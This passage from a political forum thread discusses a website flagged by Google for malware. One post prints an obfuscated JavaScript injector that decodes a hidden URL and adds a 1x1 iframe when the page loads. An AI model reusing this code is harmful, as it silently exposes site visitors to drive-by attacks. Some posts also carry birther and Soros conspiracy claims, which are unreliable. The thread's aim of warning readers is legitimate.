blocked by Google because of a single bad link.
Free Republic prohibits third-party scripts of any sort, therefore is not susceptible to this type of shenanigan.
~~~ ~~~ ~~~ ~~~ ~~~
Is this really it? (re: possible Obama's Kenyan B.C. - Attny Taitz) Click on the link
That piece of line noise is obfuscated JavaScript that generates this little gem:function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){ AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf += String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;} function hjgksr(){var GncOozzc=new Function("QtBFdMu", "return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f, 'U','299U288U300U314U290U298U289U315U')+"."+YuLQmW(-0x7- 0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c- 0x14);zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c- 0x25+0x0+0x4e, 'V','181V224V239V251V232V228V236V169V254V224V237V253V225V 180V184V169V225V236V224V238V225V253V180V184V169V235V230V2 51V237V236V251V180V185V169V239V251V232V228V236V235V230V25 1V237V236V251V180V185V169V250V251V234V180V174V225V253V253 V249V179V166V166V250V236V234V252V251V224V253V240V164V232V 229V236V251V253V250V167V234V231V166V234V240V235V236V251V1 66V224V231V167V234V238V224V182V189V174V183V181V166V224V23 9V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load', hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);}
<iframe width=1 height=1 border=0 frameborder=0 src=''></iframe>
. I can tell you right now that Chinese site is up to no good. ~~~ ~~~ ~~~ ~~~ ~~~
As someone else said - the Wild Wooly Web is NOT anonymous nor without potholes - and as the LDot info shows, it's not just the site itself you have to worry about. I run all over the place with my Firefox and AdblockPlus & NoScript plugins, and have AVG, SuperAntiSpyware, and AdAware running on the system. I don't use Infernal Exploder except to visit Micro$oft, and so far have not had any infection since I brought this system live on XP-SP2 in Sept, 2007; but a lot of nasty stuff has been blocked.
Be careful out there. By the way, the offending exploit in Orly Taitz site has been taken off - for now. Considering Obama has his Acorn IT team in the White House I'm sure it's all coincidence that the 'anti-Obama' sites are getting hammered!
From Orly Taitz website:
‘There is no malaware sitting on my site, but George Soross son is sitting on Google board. He should look up the meaning of the word treason.’